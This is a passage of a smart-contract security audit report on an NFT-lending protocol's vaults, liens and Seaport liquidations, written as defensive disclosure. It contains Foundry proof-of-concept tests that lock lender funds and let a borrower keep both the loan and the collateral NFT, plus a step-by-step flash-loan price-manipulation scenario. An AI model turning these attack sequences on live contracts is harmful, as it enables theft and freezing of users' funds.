+5.2.4 WithdrawProxy funds can be locked Severity: High Risk Context: • WithdrawProxy.sol#L291-L293 • WithdrawProxy.sol#L329 • WithdrawProxy.sol#L383 • PublicVault.sol#L349 Description: If flash liens are allowed by a public vault, one can lock up the to-be-redeemed funds of a WithdrawProxy by sandwiching a call to processEpoch(). This attack goes as follows: 1. Assume the current epoch is e1. A public vault lender requests to withdraw at e1, which causes W, the withdraw proxy for this epoch, to be deployed; let time pass. 2. Someone opens a lien and gets liquidated during this epoch such that its auction ends past the next epoch e2, so that W's finalAuctionEnd becomes non-zero; let time pass. 3. Process e1 so that the current epoch to be processed next would be e2. 4. Open a new lien for 1 wei with 0 duration. 5. Instantly process e2. At this point the claim() endpoint would be called on W to reset finalAuctionEnd to 0, and the current epoch would be e3. 6. Back-run and instantly liquidate the lien created in step 4 to set W's finalAuctionEnd to a non-zero value again. Since W's claim() endpoint is the only endpoint that resets finalAuctionEnd to 0, and this endpoint can only be called when the current epoch is the claimable epoch for W (which is e2), finalAuctionEnd can never be reset to 0 anymore, as the epoch only increases in value. And so, since the redeem and withdraw endpoints of the WithdrawProxy are guarded by the onlyWhenNoActiveAuction() modifier: modifier onlyWhenNoActiveAuction() { WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } _; } the W shareholders would not be able to exit their shares. All shares are locked unless the protocol admin pushes updates to the current implementation.
// add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol // make sure to also add the following import // import { WithdrawProxy } from "core/WithdrawProxy.sol"; // Scenario 10: commitToLien -> liquidate w/ WithdrawProxy -> ... function testScenario10() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); address lender = address(1); vm.label(lender, "lender"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: lender, amountToLend: 10 ether}), payable(publicVault) ); address lender2 = address(2); vm.label(lender2, "lender2"); // lend 10 ether to the PublicVault as address(2) _lendToVault( Lender({addr: lender2, amountToLend: 10 ether}), payable(publicVault) ); // skip 1 epoch skip(14 days); _signalWithdrawAtFutureEpoch( lender, payable(publicVault), 1 // epoch to redeem ); { console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 1 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 1, "The current epoch should be 1" ); } skip(1 days); // borrow 5 eth against the dummy NFT (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 11 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 5 ether }); // uint256 collateralId = tokenContract.computeId(tokenId); skip(11 days); OrderParameters memory listedOrderOne = _liquidate(stackOne); IWithdrawProxy withdrawProxy = PublicVault(payable(publicVault)) .getWithdrawProxy(1); { ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); } { skip(2 days); console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 2 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 2, "The current epoch should be 2" ); } { ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); uint256 withdrawReserve = PublicVault(payable(publicVault)).getWithdrawReserve(); emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); emit log_named_uint("withdrawReserve", withdrawReserve); } { PublicVault(payable(publicVault)).transferWithdrawReserve(); uint256 withdrawReserve = PublicVault(payable(publicVault)).getWithdrawReserve(); emit log_named_uint("withdrawReserve", withdrawReserve); } { // allow flash liens - liens that can be liquidated in the same block they were committed IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.MinLoanDuration, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); } // borrow 1 wei against the dummy NFT (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist:
strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 0 seconds, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); { skip(14 days); console2.log("\n--- process epoch ---"); PublicVault(payable(publicVault)).processEpoch(); // current epoch should be 3 uint256 currentEpoch = PublicVault(payable(publicVault)).getCurrentEpoch(); emit log_named_uint("currentEpoch", currentEpoch); assertEq( currentEpoch, 3, "The current epoch should be 3" ); ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); // finalAuctionEnd will be non-zero emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); } console2.log("\n--- liquidate the flash lien corresponding to epoch 1 ---"); OrderParameters memory listedOrderTwo = _liquidate(stackTwo); { ( uint256 withdrawRatio, uint256 expected, uint40 finalAuctionEnd, uint256 withdrawReserveReceived ) = withdrawProxy.getState(); // finalAuctionEnd will be non-zero emit log_named_uint("finalAuctionEnd @ e_1", finalAuctionEnd); } // at this point `claim()` cannot be called for `withdrawProxy` since // the current epoch does not equal `2`, which is the CLAIMABLE_EPOCH() // for this withdraw proxy. And in fact it never will, since its current value // is `3` and its value never decreases. This means `finalAuctionEnd` will never // be reset to `0`, and so the `redeem` and `withdraw` endpoints cannot be called // and the lender funds are locked in `withdrawProxy`. { uint256 lenderShares = withdrawProxy.balanceOf(lender); vm.expectRevert( abi.encodeWithSelector(WithdrawProxy.InvalidState.selector, WithdrawProxy.InvalidStates.NOT_CLAIMED) ); uint256 redeemedAssets = withdrawProxy.redeem(lenderShares, lender, lender); } }
5.3 Medium Risk
+5.3.1 transfer(...) function in _issuePayout(...) can be replaced by a direct call Severity: Medium Risk Context: • VaultImplementation.sol#L245 Description: In the _issuePayout(...) internal function of the VaultImplementation, if the asset is WETH the amount is withdrawn from WETH to native tokens and then transferred to the borrower: if (asset() == WETH()) { IWETH9 wethContract = IWETH9(asset()); wethContract.withdraw(newAmount); payable(borrower).transfer(newAmount); } transfer limits the gas forwarded to the call to the borrower, which would prevent executing a complex callback, and due to changes in gas prices in the EVM it might even break some feature for a potential borrower contract. For the analysis of the flow for both types of vaults please refer to the following issue: • 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow' Recommendation: Call the borrower directly without restricting the gas shared, and only apply this recommendation if the recommendation from issue 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow' is applied.
+5.3.2 Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow Severity: Medium Risk Context: • VaultImplementation.sol#L245 • LienToken.sol#L226 • PublicVault.sol#L686 • PublicVault.sol#L690 • VaultImplementation.sol#L230-L249 • VaultImplementation.sol#L221 • Vault.sol#L53-L58 Description: In the commitToLien(...)
flow, the following storage parameters are updated after some of the external callback sites where payout is issued or a lien is transferred from a private vault to its owner: • collateralStateHash in LienToken: One can potentially re-enter to take another lien using the same collateral, but this is not possible since the collateral NFT token is already transferred to the CollateralToken (unless one is dealing with some esoteric NFT token). createLien(...) requires this parameter to be 0, and that is why a potential re-entrancy could bypass this requirement. | Read re-entrancy: Yes • slope in PublicVault: - | Read re-entrancy: Yes • liensOpenForEpoch in PublicVault: If flash liens are allowed, one can re-enter and process the epoch before finishing the commitToLien(...), and so the processed epoch would have open liens even though we would want to make sure this could not happen. | Read re-entrancy: Yes The re-entrancies can happen if the vault asset performs a callback to the receiver when transferring tokens (during issuance of payouts), and, if one is dealing with WETH, when the native token amount is sent via transfer(...) to the borrower. Note that in the case of native tokens, if the recommendation from the below issue is applied, the current issue could be of higher risk: • 'transfer(...) function in _issuePayout(...) can be replaced by a direct call' Recommendation: Make sure all the storage parameter updates are performed first, before the calls to potentially external contracts. The following changes are required: 1. Update the collateralStateHash before minting a lien for the vault: diff --git a/src/LienToken.sol b/src/LienToken.sol index d22b459..e61d9dc 100644 --- a/src/LienToken.sol +++ b/src/LienToken.sol @@ -220,17 +220,16 @@ contract LienToken is ERC721, ILienToken, AuthInitializable, AmountDeriver { revert InvalidSender(); } -(lienId, newStack) = _createLien(s, params); +(newStack) = _createLien(s, params); owingAtEnd = _getOwed(newStack, newStack.point.end); -s.collateralStateHash[params.lien.collateralId] = bytes32(lienId); emit NewLien(params.lien.collateralId, newStack); } function _createLien( LienStorage storage s, ILienToken.LienActionEncumber calldata params -) internal returns (uint256 newLienId, ILienToken.Stack memory newSlot) { +) internal returns (ILienToken.Stack memory newSlot) { uint40 lienEnd = (block.timestamp + params.lien.details.duration) .safeCastTo40(); Point memory point = Point({ @@ -241,6 +240,8 @@ contract LienToken is ERC721, ILienToken, AuthInitializable, AmountDeriver { newSlot = Stack({lien: params.lien, point: point}); newLienId = uint256(keccak256(abi.encode(newSlot))); +s.collateralStateHash[params.lien.collateralId] = bytes32(newLienId); _safeMint( params.receiver, newLienId, 2.
For public vaults, first add the lien, then issue the payout: diff --git a/src/PublicVault.sol b/src/PublicVault.sol index 654d8b1..c26c7b7 100644 --- a/src/PublicVault.sol +++ b/src/PublicVault.sol @@ -487,8 +487,8 @@ contract PublicVault is VaultImplementation, IPublicVault, ERC4626Cloned { (address, uint256, uint40, uint256, address, uint256) ); -_issuePayout(borrower, amount, feeTo, feeRake); _addLien(tokenId, lienSlope, lienEnd); +_issuePayout(borrower, amount, feeTo, feeRake); } return IERC721Receiver.onERC721Received.selector;
+5.3.3 UNI_V3Validator fetches spot prices that may lead to price manipulation attacks Severity: Medium Risk Context: UNI_V3Validator.sol#L126-L130 Description: UNI_V3Validator.validateAndParse() checks the state of the Uniswap V3 position. This includes checking the LP value through LiquidityAmounts.getAmountsForLiquidity. //get pool state //get slot 0 (uint160 poolSQ96, , , , , , ) = IUniswapV3PoolState( V3_FACTORY.getPool(token0, token1, fee) ).slot0(); (uint256 amount0, uint256 amount1) = LiquidityAmounts .getAmountsForLiquidity( poolSQ96, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity ); • LiquidityAmounts.sol#L177-L221 When we deep dive into getAmountsForLiquidity, we see three cases: the price is below the range, the price is within the range, and the price is above the range. function getAmountsForLiquidity( uint160 sqrtRatioX96, uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount0, uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); if (sqrtRatioX96 <= sqrtRatioAX96) { amount0 = getAmount0ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } else if (sqrtRatioX96 < sqrtRatioBX96) { amount0 = getAmount0ForLiquidity( sqrtRatioX96, sqrtRatioBX96, liquidity ); amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioX96, liquidity ); } else { amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } } } For simplicity, we can break down getAmount1ForLiquidity: /// @notice Computes the amount of token1 for a given amount of liquidity and a price range /// @param sqrtRatioAX96 A sqrt price representing the first tick boundary /// @param sqrtRatioBX96 A sqrt price representing the second tick boundary /// @param liquidity The liquidity being valued /// @return amount1 The amount of token1 function getAmount1ForLiquidity( uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); return FullMathUniswap.mulDiv( liquidity, sqrtRatioBX96 - sqrtRatioAX96, FixedPoint96.Q96 ); } } We find that amount1 is calculated as amount = liquidity * (upper price - lower price). When slot0.poolSQ96 is in the LP range, the lower price is slot0.poolSQ96; the closer slot0 is to lowerTick, the smaller amount1 is. This is vulnerable to price manipulation attacks, as IUniswapV3PoolState.slot0.poolSQ96 is effectively the spot price. Attackers can acquire huge funds through flash loans and shift the slot0 by doing large swaps on Uniswap. Assume the following scenario: the strategist signs a lien that allows the borrower to provide an ETH-USDC position with > 1,000,000 USDC and borrow 1,000,000 USDC from the vault. • The attacker first provides 1 ETH worth of LP at price range 2,000,000 ~ 2,000,001.
• The attacker borrows a flash loan to manipulate the price of the pool so that slot0.poolSQ96 = sqrt(2,000,000) (ignoring the decimals difference). • getAmountsForLiquidity values the LP position with the spot price, and finds the LP has 1 * 2,000,000 USDC in the position. The attacker borrows 2,000,000. • The attacker restores the price of the Uniswap pool and takes the profit to repay the flash loan. Note that the project team has stated clearly that UNI_V3Validator will not be used before the audit. This issue is filed to provide information to the codebase. Recommendation: Fetch the price from a reliable price oracle instead of slot0. Also, it is recommended to document the risk of UNI_V3Validator in the codebase or documentation.
+5.3.4 Users pay protocol fee for interests they do not get Severity: Medium Risk Context: PublicVault.sol#L629-L642 Description: The PublicVault._handleStrategistInterestReward() function currently charges a protocol fee by minting vault shares, affecting all vault LP participants. However, not every user receives interest payments. Consequently, a scenario may arise where a user deposits funds into the PublicVault before a loan is repaid, resulting in the user paying more in protocol fees than the interest earned. This approach appears to be unfair to certain users, leading to a disproportionate fee structure for those who do not benefit from the interest rewards. Recommendation: This is an edge case where, in certain cases, users may lose money from providing LP. The root cause of this is the way PublicVault values the total assets, considering the interest to be paid out evenly over time, while the protocol fee is charged when the payment is made. PublicVault.totalAssets: function _totalAssets(VaultData storage s) internal view returns (uint256) { uint256 delta_t = block.timestamp - s.last; return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept); } There are three potential paths to address this issue: 1. Acknowledge the risks and inform users of the risks. 2. Change the way PublicVault records the interest: distribute the interest to all vault LPs when the payment is made. This is the design most yield aggregation vaults adopt. The totalAssets only increases when the protocol gets the money. The design can be cleaner this way. function _totalAssets(VaultData storage s) internal view returns (uint256) { return uint256(s.yIntercept); } function updateVault(UpdateVaultParams calldata params) external { _onlyLienToken(); VaultData storage s = _loadStorageSlot(); _accrue(s); //we are a payment if (params.decreaseInYIntercept > 0) { _setYIntercept(s, s.yIntercept - params.decreaseInYIntercept); } else { increaseYIntercept(params.interestPaid); } _handleStrategistInterestReward(s, params.interestPaid); } 3. Set the post-protocol-fee s.slope and transfer protocol fees to the owner when a payment is made: function _addLien( uint256 tokenId, uint256 lienSlope, uint40 lienEnd ) internal { VaultData storage s = _loadStorageSlot(); _accrue(s); + lienSlope = lienSlope.mulWadDown(1e18 - VAULT_FEE()); uint256 newSlope = s.slope + lienSlope; _setSlope(s, newSlope); uint64 epoch = getLienEpoch(lienEnd); _increaseOpenLiens(s, epoch); emit LienOpen(tokenId, epoch); } Astaria: Based on our research we will accept option 1 as the recommendation. Attempted a toy implementation that involved keeping the strategist reward off the books until repayment or liquidation. Such an implementation requires a significant overhaul of the code base. Spearbit: Acknowledged.
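For a concrete (hypothetical) illustration of issue 5.3.4: suppose a vault's totalAssets is 100 WETH, of which 10 WETH is interest that has already accrued through the slope, and VAULT_FEE() is 10%. A user who deposits right before the borrower repays buys shares at a price that already includes the accrued 10 WETH. When the payment lands, _handleStrategistInterestReward mints the strategist shares worth roughly 1 WETH (10% of the 10 WETH interest), diluting every holder, including the new depositor who earned essentially none of that interest; the depositor's dilution can therefore exceed the interest they actually accrue.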
+5.3.5 Incorrect fee calculation in _handleStrategistInterestReward resulting in undercharged fees in PublicVault Severity: Medium Risk Context: LienToken.sol#L392-L430 Description: In the PublicVault contract, the function _handleStrategistInterestReward is called during the makePayment process. However, the totalAssets of the PublicVault does not change in makePayment (assuming a normal payment scenario), so _mint(owner(), feeInShares); dilutes the share price and results in a smaller fee collection by the protocol. Assume totalAssets = 2000, interestPaid = 1000 and VAULT_FEE = 50%: t0: totalSupply 1,000, totalAssets 2000, protocolFee --, protocolShares --, pricePerShare 2; t1: totalSupply 1,000, totalAssets 2000, protocolFee 500, protocolShares 500 / 2 = 250, pricePerShare -; t2: totalSupply 1,250, totalAssets 2000, protocolFee 500, protocolShares 250, pricePerShare 1.6. While the protocol should collect 500, it only collects 250 * 1.6 = 400. Recommendation: uint256 feeInShares = fee.mulDivDown(totalSupply(), totalAssets() - fee); // instead of uint256 feeInShares = fee.mulDivDown(totalSupply(), totalAssets()); Astaria: Fixed in PR 350. Spearbit: Verified.
+5.3.6 Seaport auctions not compatible with USDT Severity: Medium Risk Context: CollateralToken.sol#L173 Description: As per the ERC20 specification, approve() returns a boolean: function approve(address _spender, uint256 _value) public returns (bool success) However, USDT deviates from this standard and its approve() method doesn't have a return value. Hence, if USDT is used as a payment token, the following line reverts in validateOrder() as it expects return data but doesn't receive it: paymentToken.approve(address(transferProxy), s.LIEN_TOKEN.getOwed(stack)); Recommendation: Use solmate's safeApprove() function to accommodate USDT's approve(): paymentToken.safeApprove(address(transferProxy), s.LIEN_TOKEN.getOwed(stack)); Astaria: Fixed in PR 339. Spearbit: Verified.
+5.3.7 Borrowers cannot provide slippage protection parameters when committing to a lien Severity: Medium Risk Context: • AstariaRouter.sol#L497-L504 Description: When a borrower commits to a lien, AstariaRouter calls the strategy validator to fetch the lien details (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( strategyValidator ).validateAndParse( commitment.lienRequest, msg.sender, commitment.tokenContract, commitment.tokenId ); details include rate, duration, liquidationInitialAsk: struct Details { uint256 maxAmount; uint256 rate; //rate per second uint256 duration; uint256 maxPotentialDebt; // not used anymore uint256 liquidationInitialAsk; } The borrower cannot provide slippage protection parameters to make sure these 3 values cannot fall into undesired ranges. Recommendation: Allow the borrower to provide slippage protection parameters to prevent the details parameters from being set to undesired values: • rate: borrower provides an upper bound. • duration: borrower can provide lower and upper bounds. Lower bound protection would be more important. • liquidationInitialAsk: borrower can provide lower and upper bounds. The protocol still checks that this value is not less than the to-be-owed amount at the end of the lien's term.
+5.3.8 The liquidation's auction starting price is not chosen perfectly Severity: Medium Risk Context: • AstariaRouter.sol#L703 Description: When a lien is expired and liquidated, the starting price for its Seaport auction is chosen as stack.lien.details.liquidationInitialAsk.
It would make more sense to have the startingPrice be the maximum of the amount owed up to now and stack.lien.details.liquidationInitialAsk: p_s = max(L_in, a_owed), where L_in is the liquidationInitialAsk and a_owed is the amount owed. For example, if the liquidate(...) endpoint is called way after the lien's expiration time, the amount owed might be bigger than stack.lien.details.liquidationInitialAsk. When a lien is created the protocol checks that stack.lien.details.liquidationInitialAsk is not smaller than the to-be-owed amount at the end of the lien's term. But the lien can keep accruing interest if it is not liquidated right away when it expires. Recommendation: Use the recommendation above and set startingPrice as uint256 startingPrice = Math.max( stack.lien.details.liquidationInitialAsk, s.LIEN_TOKEN.getOwed(stack) ); Astaria: Fixed in PR 337. Spearbit: Fixed.
+5.3.9 Canceled Seaport auctions can still be claimed by the liquidator Severity: Medium Risk Context: • CollateralToken.sol#L263-L271 • AstariaRouter.sol#L696 Description: Canceled auctions can still be claimed by the liquidator: if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, counterAtLiquidation)) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } If in the future we would add an authorised endpoint that could call s.SEAPORT.incrementCounter() to cancel all outstanding NFT auctions, the liquidator can call the endpoint liquidatorNFTClaim(..., counterAtLiquidation), where counterAtLiquidation is the old counter, to claim its NFT after the canceled Seaport auction ends. Recommendation: Make sure to use the current Seaport counter when authenticating an auction hash if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, s.SEAPORT.getCounter(address(this))) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } Astaria: The goal was to allow the case where non-cancelled (expired) auctions could still be retrieved; there's no interest in incrementing nonces. Recommendation applied in PR 343. Spearbit: Fixed.
+5.3.10 The risk of bad debt is transferred to the non-redeeming shareholders and not the redeeming holders Severity: Medium Risk Context: • PublicVault.sol#L373-L379 • PublicVault.sol#L411 Description: Right before a successful processEpoch(), the total assets A equal A = y_0 + s · (t − t_last) = B + Σ_{s ∈ U1} a(s, t) + Σ_{(s, t_l) ∈ U2} a(s, t_l). All the parameter values in the below list are considered as just before calling the processEpoch() endpoint unless stated otherwise. • A | totalAssets() • y_0 | yIntercept • s | slope • t_last | last timestamp used to update y_0 or s • t | block.timestamp • B | ERC20(asset()).balanceOf(PublicVault), underlying balance of the public vault • U1 | The set of active liens/stacks owned by the PublicVault; this can be non-empty due to how long the lien durations can be • U2 | The set of liquidated liens/stacks and their corresponding liquidation timestamp (t_l) which are owned by the current epoch's WithdrawProxy W_{e_curr}. These liens belong to the current epoch, but their auction ends in the next epoch duration. • a(s, t) | total amount owed by the stack s up to the timestamp t. • S | totalSupply(). • S_W | number of shares associated with the current epoch's WithdrawProxy, currentWithdrawProxy.totalSupply() • E | currentWithdrawProxy.getExpected().
• y'_0 | yIntercept after calling processEpoch(). • w_r | withdrawReserve; this is the value after calling processEpoch(). • t_p | t_last after calling processEpoch(). • A' | totalAssets after calling processEpoch(). • W_n | the current epoch's WithdrawProxy before calling processEpoch(). • W_{n+1} | the current epoch's WithdrawProxy after calling processEpoch(). Also assume that claim() was already called on the previous epoch's WithdrawProxy if needed. After the call to processEpoch() (in the same block), we would have roughly (not considering the division errors): A' = y'_0 + s · (t − t_p), A' = (1 − S_W/S) · A + Σ_{s ∈ U1} (a(s, t) − a(s, t_p)), w_r = (S_W/S) · (B + Σ_{s ∈ U1} a(s, t_p)), A = A' + w_r + (S_W/S) · Σ_{(s, t_l) ∈ U2} a(s, t_l), and so: A − A' = w_r + (S_W/S) · E. To be able to call processEpoch() again we need to make sure w_r tokens have been transferred to W_n, either from the public vault's assets B or from W_{n+1}'s assets. Note that at this point w_r equals w_r = (S_W/S) · B + (S_W/S) · Σ_{s ∈ U1} a(s, t_p). The (S_W/S) · B portion is an actual asset and can be transferred to W_n right away. The (S_W/S) · Σ_{s ∈ U1} a(s, t_p) portion is a percentage of the amount owed by active liens at the time processEpoch() was called. Depending on whether these liens get paid fully or not we would have: • If they get fully paid, there are no risks for the future shareholders to bear. • If these liens are not fully paid, since we have transferred the (S_W/S) · Σ_{s ∈ U1} a(s, t_p) from the actual asset balance to W_n, the redeeming shareholders would not take the risk of these liens getting liquidated for less than their value. But these risks are transferred to the upcoming shareholders or the shareholders who have not redeemed their positions yet. Recommendation: The above should be noted for the users and also documented. To safeguard, perhaps we should define w_r = (S_W/S) · B and only transfer the portions of the exited liens to W_n that correspond to (S_W/S) · Σ_{s ∈ U1} a(s, t_p). This would require changes to the accounting of the WithdrawProxy and would potentially delay the withdraw shares a bit further.
+5.3.11 validateOrder(...) does not check the consideration amount against its token balance Severity: Medium Risk Context: • CollateralToken.sol#L158 Description: When a lien position gets liquidated, the CollateralToken creates a full restricted Seaport auction with itself as both the offerer and the zone. This will cause Seaport to do a callback to the CollateralToken's validateOrder(...) endpoint at the end of order fulfilment/matching. In this endpoint we have: uint256 payment = zoneParameters.consideration[0].amount; This payment amount is not validated. Recommendation: Make sure 1. ERC20(zoneParameters.consideration[0].token).balanceOf(CollateralToken) is at least the payment amount. 2. Inherit from seaport-core/../AmountDeriver, call _locateCurrentAmount(...) to derive the correct amount based on the start/end timestamps/amounts, and compare it to payment. Astaria: Fixed in PR 337. Spearbit: Fixed.
+5.3.12 If the auction window is 0, the borrower can keep the lien amount and also take back its collateralised NFT token Severity: Medium Risk Context: • AstariaRouter.sol#L300-L302 • CollateralToken.sol#L527 • seaport-core/src/lib/OrderValidator.sol#L677 • seaport-core/src/lib/Verifiers.sol#L58 Description: If an authorised entity would file to set the auctionWindow to 0, borrowers can keep their lien amount and also take back their collateralised NFT tokens. Below is how this type of vulnerability works: 1.
A borrower takes a lien from a vault by collateralising its NFT token. 2. The borrower lets time pass so that its lien/stack position can be liquidated. 3. The borrower atomically liquidates and then calls the liquidatorNFTClaim(...) endpoint of the CollateralToken. The timestamps are as follows: t_lien_s ≤ t_lien_e = t_auction_s = t_auction_e. We should note that in step 3 above, when the borrower liquidates its own position, the CollateralToken creates a Seaport auction by calling its validate(...) endpoint. This endpoint does not validate the order's timestamps, so the auction is created even though the timestamps provided are not valid. When one tries to fulfil/match the order, Seaport requires that t_auction_s ≤ t_now < t_auction_e, so it is not possible to fulfil/match an order where t_auction_s = t_auction_e. Thus, in step 3 it is not needed to call liquidatorNFTClaim(...) immediately, as the auction created cannot be fulfilled by anyone. // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns(address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } function testScenario14() public { // set the auction window to 0 IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.AuctionWindow, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); console2.log("[+] set auction window to 0."); { address borrower1 = _createUser(0xb055033501, "borrower1"); address vaultOwner = _createUser(0xa77ac3, "vaultOwner"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); console2.log("vault start: %s", IPublicVault(publicVault).START()); skip(14 days); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); vm.startPrank(borrower1); (uint256 lienId, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 10 ether }), amount: 2 ether, revertMessage: "" }); console2.log("ETH balance of the borrower: %s", borrower1.balance); skip(1 hours); console2.log("[+] lien created. lienId: %s", lienId); OrderParameters memory params = _liquidate(stack); console2.log("[+] lien liquidated by the borrower."); COLLATERAL_TOKEN.liquidatorNFTClaim( stack, params, COLLATERAL_TOKEN.SEAPORT().getCounter(address(COLLATERAL_TOKEN)) ); console2.log("[+] liquidator/borrower claimed NFT.\n"); vm.stopPrank(); console2.log("owner of the NFT token: %s", nft1.ownerOf(tokenId1)); console2.log("ETH balance of the borrower: %s", borrower1.balance); assertEq( nft1.ownerOf(tokenId1), borrower1, "the borrower should own the NFT" ); assertEq( borrower1.balance, 2 ether, "borrower should still have the lien amount." ); } } forge t --mt testScenario14 --ffi -vvv: [+] set auction window to 0.
[+] public vault is created: 0x4430c0731d87768Bf65c60340D800bb4B039e2C4 vault start: 1 ETH balance of the borrower: 2000000000000000000 [+] lien created. lienId: 91310819262208864484407122336131134788367087956387872647527849353935417268035 [+] lien liquidated by the borrower. [+] liquidator/borrower claimed NFT. owner of the NFT token: 0xA92D072d39E6e0a584a6070a6dE8D88dfDBae2C7 ETH balance of the borrower: 2000000000000000000 Recommendation: Make sure auctionWindow cannot be set to 0 by anyone. Also, it might be best to define a hard-coded lower bound and make sure auctionWindow cannot be set lower than that value.
+5.3.13 A malicious collateralized NFT token can block liquidation and also epoch processing for public vaults Severity: Medium Risk Context: • CollateralToken.sol#L523-L526 • PublicVault.sol#L353-L357 Description: When a lien gets liquidated, the CollateralToken tries to create a Seaport auction for the underlying token. One of the steps in this process is to give approval for the token id to the CollateralToken's conduit: ERC721(orderParameters.offer[0].token).approve( s.CONDUIT, orderParameters.offer[0].identifierOrCriteria ); A malicious/compromised ERC721(orderParameters.offer[0].token) can take advantage of this step and revert in the approve(...). There are a few consequences of this, with the last being the most important one: 1. One would not be able to liquidate the expired lien. 2. Because of 1, the epoch processing for a corresponding public vault will be halted, since one can only process the current epoch if all of its open liens are paid for or liquidated: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); } Recommendation: 1. The strategist or the public vault owner/delegate needs to make sure to only sign roots of trees with leaves whose corresponding ERC721 tokens have been thoroughly checked, to make sure they would not be able to revert the approve call. 2. Or, one can move the approval-to-the-conduit step to when a lien is committed to / opened. This way, if the call reverts, a lien is not created, so the epoch processing for the public vault cannot be halted. This comes with some risks, since the conduit would hold the token approval for a longer period compared to the current implementation, where it only has the approval during the liquidation phase.
5.4 Low Risk
